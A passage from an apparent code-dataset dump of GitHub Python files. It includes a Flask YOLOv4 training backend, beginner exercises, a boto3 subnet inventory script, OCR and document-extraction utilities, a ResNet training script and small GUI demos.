else:\r\n last_line ='\\n'\r\n return last_line\r\n\r\n@app.route('/via',methods=['GET', 'POST'])#0.5新增内容\r\ndef go2via():\r\n if request.method == \"GET\":\r\n print(request.args.get(\"userId\"),request.args.get(\"trainSetId\"))\r\n return render_template('via.html',login_user=\"test_user\",train_set=request.args.get(\"trainSetId\"))\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n return jsonify({'code':200,'status':1,'IMAGES':thisUser.getTrainSet(request.form.get('trainid'))})\r\n\r\nISRUN=False \r\n\r\ndef to_thread(cmd):\r\n global ISRUN\r\n ok=os.system(PATH+cmd+\" >> user.log \")\r\n #print(PATH+cmd+\" >> user.log \")\r\n ISRUN=False\r\n return\r\n\r\n@app.route('/logicMe/',methods = [\"GET\",\"POST\"])#测试需要,没有加入0.3修改版内容\r\ndef logic(): \r\n global ISRUN \r\n if request.method == \"POST\":\r\n cmd = request.form.get('cmd')#type=str, default=None)\r\n #ip = request.remote_addr\r\n if cmd :\r\n if ISRUN: \r\n last_line=readLastLine('user.log')\r\n time.sleep(0.5) #由后端控制轮询速度\r\n return jsonify({'code':200,'status':1,'msg':last_line})\r\n elif int(request.form.get('isFirst'))==1: \r\n ISRUN=True \r\n _thread.start_new_thread(to_thread, ('print',)) \r\n last_line=\"0.5版该语句无效\\n\"\r\n return jsonify({'code':200,'status':1,'msg':last_line}) \r\n else:\r\n last_line=readLastLine('user.log') \r\n return jsonify({'code':200,'status':1,'msg':last_line,'end':1}) \r\n\r\n ##json.dumps(dic,ensure_ascii=False) #个人笔记:这种方式需要前端使用JSON.parse,django常用这种\r\n ##return jsonify({'code':200,'status':1,'msg':last_line})\r\n else:\r\n return jsonify({'code':400,'message':'Error'})\r\n\r\n@app.route('/addObject/',methods = [\"GET\",\"POST\"])#0.5版新增内容\r\ndef addObject(): #且包含增加训练集的交互\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n if request.form.get('what')=='object':\r\n if thisUser.add_obj(request.form):\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"}) \r\n elif request.form.get('what')=='trains':\r\n #if thisUser.add_obj(request.form):\r\n upload_files=request.files.getlist('FILE')\r\n #print(\"------>\",upload_files)\r\n if thisUser.add_trainImg(request.form,upload_files):\r\n print(request.form)\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"}) \r\n\r\n@app.route('/TrainSetLabelsAdd/',methods = [\"GET\",\"POST\"])#0.5版新增内容\r\ndef userTrainSetLabel():\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n if thisUser.leabels('add',request.form.get('trainid'),json.loads(request.form.get('labels'))):\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"})\r\n \r\n@app.route('/loadUser/',methods = [\"GET\",\"POST\"])#0.5版新增内容\r\ndef loadUser():\r\n #读出用户的文件菜单\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n reqList=thisUser.getUserlis(request.form.get('what'))\r\n return jsonify({'code':200,'status':1,'msg':reqList,'serverFiles':len(os.listdir('./static/public_train/images/'))}) \r\n\r\n@app.route('/deletit/',methods = [\"GET\",\"POST\"])\r\ndef deletit():\r\n if request.method == \"POST\":\r\n thisUser=User(request.form.get('userid'))\r\n if request.form.get('what')=='trains':\r\n if thisUser.delet_trains(request.form.get('thisis')):\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"})\r\n\r\n\r\n@app.route('/ws')#websocket试验,参考https://www.cnblogs.com/yb635238477/p/9795097.html\r\ndef ws():\r\n print(request.environ.get('wsgi.websocket'))\r\n print(request.environ)\r\n user_socket = request.environ.get('wsgi.websocket') # type: WebSocket\r\n if user_socket: \r\n while 1:\r\n msg = user_socket.receive() # 接受消息\r\n print(msg)\r\n user_socket.send(msg) # 发送消息\r\n\r\n\r\n@app.route('/go03')#进入0.3修改版\r\ndef index03():\r\n return render_template('index03.html')\r\n@app.route('/logicMake/',methods = [\"GET\",\"POST\"])#0.3修改版内容完全copy,由于路径问题无法测试\r\ndef logicMake(): \r\n if request.method == \"POST\":\r\n print(\"用户创建\"+request.form.get('mdList1')+\" +cfg:\"+request.form.get('mdList2'))\r\n print(request.form.get('class_names'))\r\n names = request.form.get('class_names')\r\n class_names_path=r\"D:\\test_yolov4\\classes.names\"\r\n if os.path.exists(class_names_path):#判断此文件是否存在 ,存在删除\r\n os.remove(class_names_path) \r\n with open(class_names_path, \"a+\", encoding=\"utf-8\") as f2:\r\n f2.write(names)\r\n \r\n class_num = read_class_file(class_names_path)\r\n print(\"class_num:\",class_num)\r\n print(type(class_num))\r\n percent = request.form.get('ratio')\r\n print(\"---\",percent)\r\n # class_names_path train_path val_path obj.data 放在先前设置的文件夹中 同一个文件夹中 文件夹必须用英文命名\r\n # weight_save 设置存放的文件夹\r\n class_names_path=r\"D:\\test_yolov4\\classes.names\" #放着类别名称的文件\r\n weight_save=r\"D:\\test_yolov4\\yolov4_train\" #选择存放训练完成后权重的文件夹\r\n train_path = r\"D:\\test_yolov4\\train.txt\" #放着训练的图片路径的txt文件\r\n val_path = r\"D:\\test_yolov4\\val.txt\" # #放着验证的图片路径的txt文件\r\n obj_data_path = r\"D:\\test_yolov4\\obj.data\" #放训练综合文件的文件\r\n #前端选择标注完成训练的文件夹\r\n train_floder = [r\"E:\\yolov3_train2_pig20201216\\images\"]#数据集文件夹列表 选择\r\n \r\n if percent ==\"0\": \r\n training_set(percent,train_floder,train_path)\r\n writer_objfile(percent,class_num,class_names_path,train_path,weight_save,obj_data_path)\r\n print(\"^^^\",val_path)\r\n training_set(percent,train_floder,train_path,val_path=val_path)\r\n \r\n writer_objfile(percent,class_num,class_names_path,train_path,weight_save,obj_data_path,val_path=val_path)\r\n #此处添加的YOLO调整参数,其他模型需要跳转\r\n if request.form.get('mdList1') == \"yolov4\":\r\n cfg_parame = {} \r\n cfg_parame[\"batch\"] = request.form.get('batch')+\"\\n\"\r\n # print(\"batch\",request.form.get('batch'))\r\n cfg_parame[\"subdivisions\"] = request.form.get('subdivisions')+\"\\n\"\r\n cfg_parame[\"width\"] = request.form.get('width')+\"\\n\"\r\n cfg_parame[\"height\"] = request.form.get('height')+\"\\n\"\r\n # print(\"angle\",request.form.get('angle'))\r\n cfg_parame[\"angle\"] = request.form.get('angle')+\"\\n\"\r\n\r\n cfg_parame[\"learning_rate\"] = request.form.get('learning_rate')+\"\\n\"\r\n cfg_parame[\"max_batches\"] = request.form.get('max_batches')+\"\\n\"\r\n cfg_parame[\"steps\"] = request.form.get('steps')+\"\\n\"\r\n cfg_parame[\"scales\"] = request.form.get('scales')+\"\\n\"\r\n\r\n cfg_parame[\"classes\"] = str(class_num)+\"\\n\" #得到类别的数量\r\n cfg_parame[\"filters\"] = str((int(class_num)+5)*3)+\"\\n\" #计算最后一层filters数量 (类别数+5)*3\r\n print(cfg_parame[\"filters\"])\r\n \r\n\r\n if request.form.get('mdList2') ==\"yolov4-tiny.cfg\":\r\n old_cfg_name = \"yolov4-tiny.cfg\" #存放tiny.cfg原地址\r\n new_cfg_name = os.path.join(r\"D:\\test_yolov4\",time.strftime(\"%d_%m_%Y_\")+\"user_yolov4-tiny.cfg\")#新地址新名字\r\n alter_file(old_cfg_name,new_cfg_name,**cfg_parame) #调用生成文件函数\r\n\r\n elif request.form.get('mdList2') ==\"yolov4.cfg\":\r\n old_cfg_name = \"yolov4.cfg\" #存放cfg原地址\r\n new_cfg_name = os.path.join(r\"D:\\test_yolov4\",time.strftime(\"%d_%m_%Y_\")+\"user_yolov4-tiny.cfg\") #新地址新名字 \r\n #......\r\n return jsonify({'code':200,'status':1,'msg':\"okk\"}) \r\n\r\nif __name__ == '__main__':\r\n #app.run(host='0.0.0.0', port=8910, debug=True)\r\n http_serv = WSGIServer(('0.0.0.0',8910),app,handler_class=WebSocketHandler)\r\n http_serv.serve_forever()\r\n","repo_name":"yourkg/--","sub_path":"demo_02/v1.0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2253455280","text":"# Ejercicio 4: Asume que ejecutamos las siguientes sentencias de asignación:\n# ancho = 17\n# alto = 12.0\n# Para cada una de las expresiones siguientes, \n# escribe el valor de la expresión y el tipo (del valor de la expresión).\n#1. ancho/2\n#2. ancho/2.0\n#3. alto/3\n#4. 1 + 2 * 5\n\nancho = 17\nalto = 12.0\n\na = ancho/2\nb = ancho/2.0\nc = alto/3\nd = 1 + 2 * 5\n\nprint('ancho/2 = ',a,type(a))\nprint('ancho/2.0 = ',b,type(b))\nprint('alto/3 = ',c,type(c))\nprint('1 + 2 * 5 = ',d,type(d))\n","repo_name":"josereyg21/python-para-todos","sub_path":"Cap 2/2-4.py","file_name":"2-4.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5852901319","text":"import tcod as tcod\n\n\nSCREEN_WIDTH = 80\nSCREEN_HEIGHT = 50\nLIMIT_FPS = 20\n\nfont_path = 'dejavu16x16_gs_tc.png'\nfont_flag = tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD\ntcod.console_set_custom_font(font_path, font_flag)\n\nwindow_title = 'LASM'\nfullscreen = False\nroot_console = tcod.console_init_root(SCREEN_WIDTH, SCREEN_HEIGHT, window_title, fullscreen)\ntcod.sys_set_fps(LIMIT_FPS)\n\nwhile not tcod.console_is_window_closed():\n tcod.console_set_default_foreground(0, tcod.white)\n # tcod.console_put_char(0, 1, 1, '@', tcod.BKGND_NONE)\n root_console.print_(10, 5, \"Player\")\n\n tcod.console_flush()\n\n\n","repo_name":"CriminalBacon/genomPy","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73348139757","text":"__all__ = ('ilogging', )\r\n\r\nfrom pathlib import Path\r\nfrom datetime import datetime\r\nfrom utils.envs import res_dir\r\nfrom logging import basicConfig, DEBUG, getLogger\r\n \r\n__logger__ = None\r\n\r\n\r\ndef __setup__():\r\n global __logger__\r\n\r\n logs_path = Path(res_dir()) / 'Logs'\r\n if not logs_path.exists():\r\n try:\r\n logs_path.mkdir(parents=True)\r\n except:\r\n pass\r\n\r\n logfile_name = logs_path.joinpath(datetime.now().strftime('%B-%Y') + '.log')\r\n basicConfig(filename=logfile_name,\r\n format='%(asctime)s :: %(levelname)s :: %(name)s :: %(message)s')\r\n __logger__ = getLogger('SYAI-M3Play')\r\n __logger__.setLevel(DEBUG)\r\n\r\n\r\ndef ilogging(message, level: str = 'e'):\r\n if level == 'i':\r\n __logger__.info(repr(message))\r\n elif level == 'e':\r\n __logger__.error(repr(message))\r\n elif level == 'd':\r\n __logger__.debug(repr(message))\r\n elif level == 'c':\r\n __logger__.critical(repr(message))\r\n else:\r\n __logger__.warning(repr(message))\r\n\r\n\r\n__setup__()\r\n","repo_name":"sntakirutimana72/M3Play","sub_path":"utils/loggers/ilogger.py","file_name":"ilogger.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70375332075","text":"#!/usr/bin/env python\n\nimport cPickle\n\nimport numpy as np\nimport tensorflow as tf\n\nimport model\n\n\ndef unpickle(file):\n fo = open(file, 'rb')\n dict = cPickle.load(fo)\n fo.close()\n return dict\n\n\ndef one_hot_vec(label):\n vec = np.zeros(10)\n vec[label] = 1\n return vec\n\n\ndef load_data():\n x_all = []\n y_all = []\n for i in range(5):\n d = unpickle(\"cifar-10-batches-py/data_batch_\" + str(i + 1))\n x_ = d['data']\n y_ = d['labels']\n x_all.append(x_)\n y_all.append(y_)\n\n d = unpickle('cifar-10-batches-py/test_batch')\n x_all.append(d['data'])\n y_all.append(d['labels'])\n\n x = np.concatenate(x_all) / np.float32(255)\n y = np.concatenate(y_all)\n x = np.dstack((x[:, :1024], x[:, 1024:2048], x[:, 2048:]))\n x = x.reshape((x.shape[0], 32, 32, 3))\n\n pixel_mean = np.mean(x[0:50000], axis=0)\n x -= pixel_mean\n\n y = map(one_hot_vec, y)\n X_train = x[0:50000, :, :, :]\n Y_train = y[0:50000]\n X_test = x[50000:, :, :, :]\n Y_test = y[50000:]\n\n return (X_train, Y_train, X_test, Y_test)\n\n\ndef main():\n # Define hyper-parameter\n learning_rate = 0.01\n batch_size = 12\n epoch_number = 1\n steps_to_validate = 12\n resnet_layer_number = 32 # 20\n\n # Load training dataset\n X_train, Y_train, X_test, Y_test = load_data()\n\n # Define the model\n X = tf.placeholder(\"float\", [None, 32, 32, 3])\n Y = tf.placeholder(\"float\", [None, 10])\n net = model.resnet(X, resnet_layer_number)\n cross_entropy = -tf.reduce_sum(Y * tf.log(net))\n opt = tf.train.MomentumOptimizer(learning_rate, 0.9)\n train_op = opt.minimize(cross_entropy)\n correct_prediction = tf.equal(tf.argmax(net, 1), tf.argmax(Y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n # Define other tools\n saver = tf.train.Saver()\n checkpoint = tf.train.latest_checkpoint(\"./checkpoint/\")\n init_op = tf.initialize_all_variables()\n\n # Start the session\n with tf.Session() as sess:\n sess.run(init_op)\n\n # Restore from checkpoint\n if checkpoint:\n print(\"Restore checkpoint from: {}\".format(checkpoint))\n #saver.restore(sess, checkpoint)\n\n # Start training\n for epoch_index in range(epoch_number):\n for i in range(0, 50000, batch_size):\n feed_dict = {\n X: X_train[i:i + batch_size],\n Y: Y_train[i:i + batch_size]\n }\n sess.run([train_op], feed_dict=feed_dict)\n\n if i % steps_to_validate == 0:\n saver.save(sess, './checkpoint/', global_step=i)\n\n validate_start_index = 0\n validate_end_index = validate_start_index + batch_size\n valiate_accuracy_value = sess.run(\n [accuracy],\n feed_dict={\n X: X_test[validate_start_index:validate_end_index],\n Y: Y_test[validate_start_index:validate_end_index]\n })\n print(\"Epoch: {}, image id: {}, validate accuracy: {}\".format(\n epoch_index, i, valiate_accuracy_value))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tobegit3hub/tensorflow_examples","sub_path":"resnet/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"73"} +{"seq_id":"6358642685","text":"from schoenen_data import schoenen_lijst\n\n\n# opdracht 1:\n# Print alle schoenen van het merk Adidas\nfor x in schoenen_lijst:\n if x['merk'] == 'Adidas':\n print(x)\n\n# filteren\n# opdracht 2:\n# Vraag een merk en print vervolgens alle modellen van het merk en de bijbehorende prijs.\nvraag_merk = input(\"Welk merk? Kies uit Adidas, Nike, Puma of Gaastra: \")\nfor x in schoenen_lijst:\n if vraag_merk != '':\n print(x['merk'])\n print(x['model'])\n print(x['prijs'])\n \n \n# opdracht 3:\n# Vraag een merk en print vervolgens alle witte schoenen mits duurder dan €100.\n\n\n# opdracht 4:\n# vraag de maat van de klant en print vervolgens:\n# \"fonetische_kleuren Merknaam Modelnaam, prijs\"\n# uiteraard alleen de schoenen die beschikbaar zijn in betreffende maat.\n\n\n# Opdracht 5 (medium):\n# print van de duurste schoen: merk en model en doe dat ook voor de goedkoopste.\n\n\n# opdracht 6 (hard):\n# print van de schoen leverbaar in de grootste maat :\n# IN maat ... leverbaar: merk. model en kleur van de schoenen\n# (let op, filter in: in code)","repo_name":"Seantheman01/Python","sub_path":"extra/challenges/schoenen_opdracht.py","file_name":"schoenen_opdracht.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"7051277336","text":"import boto3\n\ndef subnet(logger,credentials,account,account_name):\n logger.info(f\"{account_name} >> Start Describing {subnet.__name__}...\")\n\n output = []\n\n region_list = [\n \"us-east-1\",\n \"us-east-2\",\n \"us-west-1\",\n \"us-west-2\",\n \"ap-south-1\",\n \"ap-northeast-3\",\n \"ap-northeast-2\",\n \"ap-southeast-1\",\n \"ap-southeast-2\",\n \"ap-northeast-1\",\n \"ca-central-1\",\n \"eu-central-1\",\n \"eu-west-1\",\n \"eu-west-2\",\n \"eu-west-3\",\n \"eu-north-1\",\n \"sa-east-1\"\n ]\n\n for region in region_list:\n\n client = boto3.client(\n 'ec2',\n aws_access_key_id=credentials['AccessKeyId'],\n aws_secret_access_key=credentials['SecretAccessKey'],\n aws_session_token=credentials['SessionToken'],\n region_name = region\n )\n\n response = ''\n next_token = ''\n first_check = True\n\n\n while next_token is not None:\n\n try:\n if first_check:\n response = client.describe_subnets()\n first_check = False\n else:\n response = client.describe_subnets(NextToken=next_token)\n\n for res in response['Subnets']:\n name = ''\n #get name\n if 'Tags' in res:\n for tag in res['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n break\n\n output.append({\n \"ACCOUNT\" : f\"'{account}\",\n \"ACCOUNT_NAME\" : account_name,\n \"Region\" : region,\n \"VpcId\" : res[\"VpcId\"],\n \"SubnetId\" : res[\"SubnetId\"],\n \"Name\" : name,\n \"cidr\" : res[\"CidrBlock\"],\n \"AvailabilityZone\" : res[\"AvailabilityZone\"]\n })\n\n if 'NextToken' in response:\n next_token = response['NextToken']\n else:\n next_token = None\n except Exception as e:\n logger.info(\"Error!!\")\n logger.exception(\"message\")\n \n \n logger.info(f\"{account_name} >> Finish Describing {subnet.__name__}...\")\n return output","repo_name":"sjlee-git/automation","sub_path":"python/boto3/aws_assets/describe_resources/subnet.py","file_name":"subnet.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"71866582955","text":"import tkinter as tk\n\nimport tkinter.messagebox\n\nwindow = tk.Tk()\n\nwindow.title(\"我的第一個GUI程式\")\n\nwindow.geometry('300x300')\n\ndef clickMe():\n tkinter.messagebox.showinfo(title='提示', message= '好累')\n\nlabel = tk.Label(window,text=\"我的GUI\", bg= \"#567\", fg = \"#BFC\")\n\nlabel.pack()\n\nentry = tk.Entry(window, width = 20)\n\nentry.pack()\n\nbutton = tk.Button(window, text = \"按鈕\", command = clickMe)\n\nbutton.pack()\n\nwindow.mainloop()\n","repo_name":"Eason13245/AE403-TKinter-","sub_path":"Class1_Work.py","file_name":"Class1_Work.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39072566736","text":"from PIL import Image\nimport subprocess\nimport pytesseract\nimport cv2\nimport pandas as pd\nimport zipfile\nimport rarfile\nimport os\nimport eml_parser\nimport base64\nimport datetime\nimport json\nimport pathlib\nfrom bs4 import BeautifulSoup\nimport re\nimport urllib.parse\nimport xml.etree.ElementTree as ET\nfrom paddleocr import PaddleOCR, PPStructure\nfrom paddleocr import paddleocr\nimport csv\n\nimport logging\nimport time\n\nocr = PaddleOCR(use_angle_cls=True)\ntable_engine = PPStructure(show_log=True)\npaddleocr.logging.disable(logging.DEBUG)\n\n# convert doc file to docx file\ndef convert_doc_to_docx(doc_path):\n subprocess.run(['libreoffice', '--headless', '--convert-to', 'docx', doc_path])\n\n# convert doc file to html file\ndef convert_doc_to_html(doc_path):\n subprocess.run(['libreoffice', '--headless', '--convert-to', 'html', '--convert-images-to', 'jpg', doc_path])\n\n# OCR by Python library\ndef ocr_lib(img_path):\n # image = Image.open(img_path)\n img = cv2.imread(img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # # 虚化处理\n # blurMedian = cv2.medianBlur(gray, 3)\t# 中值虚化处理\n # blurGaussian = cv2.GaussianBlur(gray,(5,5),0)\t# 高斯虚化处理\n # otsuThreshold1 = cv2.threshold(blurMedian, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)[1]\n # thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n # cnts = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n # cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n ocr_text = pytesseract.image_to_string(gray, lang='chi_sim+eng')\n return ocr_text\n\n\n# OCR by API\ndef ocr_api(img_path, csv_path=None):\n result = table_engine(img_path)\n ocr_text = ''\n now_line = 0.0\n for line in result:\n if line['type'] == 'table':\n html = line['res']['html']\n soup = BeautifulSoup(html, 'html.parser')\n # 查找HTML中的表格(假设您只有一个表格)\n table = soup.find('table')\n\n # 如果有多个表格,可以使用find_all来获取所有表格\n\n # 打开CSV文件以写入数据\n if csv_path == None:\n csv_path = '/home/norainy/jingsai/output1/' + str(time.time()) + '.csv'\n with open(csv_path, 'w', newline='', encoding='utf-8') as csv_file:\n csv_writer = csv.writer(csv_file)\n\n # 遍历表格的行和列,将数据写入CSV文件\n for row in table.find_all('tr'):\n csv_row = []\n for cell in row.find_all(['th', 'td']):\n csv_row.append(cell.get_text(strip=True))\n csv_writer.writerow(csv_row)\n return False\n else:\n for i in line['res']:\n if (i['text_region'][0][1] + i['text_region'][3][1])/2 > now_line:\n now_line = i['text_region'][3][1]\n ocr_text += '\\n' + i['text']\n else:\n ocr_text += ' ' + i['text']\n # ocr_text += i['text'] \n return ocr_text\n # img = cv2.imread(img_path)\n # gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # blurred_image = cv2.GaussianBlur(gray, (5, 5), 0)\n # result = ocr.ocr(img_path)\n # now_line = 0.0\n # ocr_text = ''\n # for idx in range(len(result)):\n # # ocr_text += result[idx][1][0]\n # res = result[idx]\n # # print(res)\n # # print(res[0][0][1])\n # if (res[0][0][1] + res[0][3][1])/2 > now_line:\n # now_line = res[0][3][1]\n # ocr_text += '\\n' + res[1][0]\n # else:\n # ocr_text += ' ' + res[1][0]\n # return ocr_text\n\ndef excel_to_json(excel_file_path):\n # 使用pandas读取Excel文件的所有工作表\n sheets = pd.read_excel(excel_file_path, sheet_name=None)\n # 创建一个字典,用于存储每个工作表的JSON数据\n json_data = {}\n # 遍历每个工作表,并将其转换为JSON格式\n for sheet_name, df in sheets.items():\n # 将DataFrame转换为JSON格式\n json_data[sheet_name] = df.to_json(orient='records', lines=True, force_ascii=False)\n return json_data\n\ndef excel_to_csv(excel_file_path, root_path):\n if not os.path.exists(root_path):\n os.mkdir(root_path)\n # 读取 Excel 文件\n xls_file = pd.ExcelFile(excel_file_path)\n\n # 获取 Excel 文件中的工作表列表\n sheet_names = xls_file.sheet_names\n # print(sheet_names)\n # 遍历每个工作表并将其保存为 CSV 文件\n for sheet_name in sheet_names:\n # 从 Excel 文件中读取工作表数据\n df = xls_file.parse(sheet_name)\n \n # 将工作表数据保存为 CSV 文件\n csv_filename = f'{root_path}/{sheet_name}.csv'\n df.to_csv(csv_filename, index=False, encoding='utf-8')\n\n\n# 解压压缩包\ndef unzip_remove(zip_file_path, extract_to_path):\n with zipfile.ZipFile(zip_file_path, 'r') as zip_ref:\n zip_ref.extractall(extract_to_path)\n os.remove(zip_file_path)\n return \n\n# unzip rar file\ndef unrar(rar_file, output_dir):\n \"\"\"Unzips a rar file to the specified output directory.\n\n Args:\n rar_file: The rar file to unzip.\n output_dir: The output directory to unzip the rar file to.\n \"\"\"\n\n try:\n with rarfile.RarFile(rar_file) as rf:\n rf.extractall(output_dir)\n print(\"RAR file extraction successful.\")\n except Exception as e:\n print(f\"Error while extracting RAR file: {e}\")\n\n# 处理eml文件\ndef process_eml(eml_file_path, file_dir_path):\n ep = eml_parser.EmlParser(include_raw_body=True, include_attachment_data=True)\n parsed_eml = ep.decode_email(eml_file_path)\n eml_text = ''\n # print(ep.get_raw_body_text(eml_file_path))\n # out_path = pathlib.Path(eml_file_path[:eml_file_path.rfind('/') + 1])\n if not os.path.exists(file_dir_path):\n os.mkdir(file_dir_path)\n out_path = pathlib.Path(file_dir_path)\n \n if 'attachment' in parsed_eml:\n for a in parsed_eml['attachment']:\n out_filepath = out_path / a['filename']\n\n print(f'\\tWriting attachment: {out_filepath}')\n with out_filepath.open('wb') as a_out:\n a_out.write(base64.b64decode(a['raw']))\n \n # print(parsed_eml)\n for i in ['subject', 'from', 'to']:\n eml_text += i + ': ' + str(parsed_eml['header'][i]) + '\\n'\n for b in parsed_eml['body']:\n # print('--------------')\n # print(b)\n for i in ['email', 'domain', 'ip']:\n eml_text += i + ': ' + str(b[i]) + '\\n'\n soup = BeautifulSoup(b['content'], 'html.parser')\n eml_text += soup.get_text(separator=\" \", strip=True)\n # print(soup.get_text(separator=' ', strip=True))\n # res1=re.findall(r\"]*>(.*?)

|]*>(.*?)\", str(b['content']))\n # res1 = b['content']\n # for r in res1:\n # eml_text += r[0]+r[1]+'\\n'\n # print(parsed_eml['body'][1]) # attachment body header\n # print(parsed_eml) # attachment body header\n \n\n # print(parsed_eml['attachment'])\n # return json.dumps(parsed_eml, default=json_serial, ensure_ascii=False)\n return eml_text\n\ndef json_serial(obj):\n if isinstance(obj, datetime.datetime):\n serial = obj.isoformat()\n return serial\n \n# 生成txt文件\ndef generate_txt(file, content):\n with open(file, 'w') as f:\n f.write(content)\n \n# 处理html文件\ndef html_to_txt(html_dir, html_name):\n html_path = os.path.join(html_dir, html_name)\n # 读取HTML文件内容\n with open(html_path, \"r\", encoding=\"utf-8\") as f:\n html_content = f.read()\n\n # 使用Beautiful Soup解析HTML\n soup = BeautifulSoup(html_content, \"html.parser\")\n text = \"\"\n # 遍历HTML文档节点\n for element in soup.descendants:\n # 提取文本内容\n if isinstance(element, str) and 'page' not in element.strip():\n text = text + element.strip()\n # print(element.strip())\n # 提取图片名称\n elif element.name == \"img\":\n src = element.get(\"src\")\n src = urllib.parse.unquote(src)\n # print(\"src: \", src)\n # img_name = re.search(r'/([^/]+)$', src)\n # if img_name:\n # print(\"Image Name:\", img_name.group(1))\n img_path = os.path.join(html_dir, src)\n image_txt = ocr_api(img_path)\n if image_txt != False:\n # text = text + '\\n From image:\\n' + image_txt\n text = text + image_txt\n return text\n\n\ndef sort_by_number(filename):\n # 使用正则表达式提取文件名中的数字部分\n match = re.search(r'\\d+', filename)\n if match:\n return int(match.group())\n else:\n return filename\n\n\n\n# 处理html文件\ndef pptx_to_txt(pptx_path, pptx_dir):\n os.rename(pptx_path, pptx_dir+'.zip')\n unzip_remove(pptx_dir+'.zip', pptx_dir)\n text = ''\n img_dir = os.path.join(pptx_dir, 'ppt', 'media')\n slide_dir = os.path.join(pptx_dir, 'ppt', 'slides')\n for root, dirs, files in os.walk(slide_dir):\n # files = sorted(files, key=sort_by_number) # 对文件排序\n for file in files:\n file_path = os.path.join(root, file)\n with open(file_path) as f:\n # pass\n xml_root = ET.parse(f).getroot()\n for elem in xml_root.iter():\n namespace, element_name = elem.tag.split(\"}\", 1)\n # print(element_name)\n if element_name == 't':\n # print(ET.tostring(elem, encoding='unicode'))\n content = elem.text\n text += content\n for root, dirs, files in os.walk(img_dir):\n for file in files:\n file_path = os.path.join(root, file)\n extension = file_path.split('.')[-1]\n # print(file_path)\n if extension in ['jpg', 'jpeg', 'png']:\n t = ocr_api(file_path)\n if t != False:\n text += t\n return text\n\n\n\nif __name__ == \"__main__\":\n start = time.time()\n text = ocr_api('/home/norainy/jingsai/赛题材料/麒麟SSL+VPN+Windows客户端使用手册_html_98bf9c15f498bb9a.png')\n # print(text)\n # text = process_eml('/home/norainy/jingsai/题目1:富文本敏感信息泄露检测/赛题材料/xxx部门弱口令漏洞问题和整改 2023-05-25T17_27_32+08_00.eml')\n # print(text)\n # text = excel_to_csv('/home/norainy/jingsai/赛题材料/wps/资产梳理.et', '/home/norainy/jingsai/赛题材料/wps')\n print(text)\n end = time.time()\n print(end-start)","repo_name":"hjdongcn/rich_text_extract","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"41444845452","text":"import torch\nfrom transformers import AutoTokenizer, AutoModel\n\n# Load the model and tokenizer\nmodel = AutoModel.from_pretrained(\"distilbert-base-cased-distilled-squad\", from_tf=True)\ntokenizer = AutoTokenizer.from_pretrained(\"distilbert-base-cased-distilled-squad\", from_tf=True)\n\ndef chatbot_response(question):\n # Encode the input text\n input_ids = torch.tensor([tokenizer.encode(question, add_special_tokens=True)])\n \n # Get the model's prediction\n with torch.no_grad():\n outputs = model(input_ids)\n answer_start_scores, answer_end_scores = outputs[:2]\n \n # Get the best answer\n answer_start = torch.argmax(answer_start_scores)\n answer_end = torch.argmax(answer_end_scores) + 1\n answer = tokenizer.decode(input_ids[0][answer_start:answer_end])\n \n return answer\n\n# Test the chatbot\nquestion = input(\"Ask your question. Ex: What is the return policy for your products? :\")\nprint(\"Question:\", question)\nprint(\"Answer:\", chatbot_response(question))\n","repo_name":"shamspias/basic_nlu_chatbot","sub_path":"chatbot_distilbert-base-cased-distilled-squad.py","file_name":"chatbot_distilbert-base-cased-distilled-squad.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"34330796133","text":"import PyQt5.QtWidgets as qtw\nimport PyQt5.QtGui as qtg\n\nclass MainWindow(qtw.QWidget):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\t# Add a title\n\t\tself.setWindowTitle(\"Hello World!!\")\n\n\t\t# Set Vertical layout\n\t\tself.setLayout(qtw.QVBoxLayout())\n\n\t\t# Create A Label\n\t\tmy_label = qtw.QLabel(\"Type Something Into The Box Below\", self)\n\t\t# Change the font size of 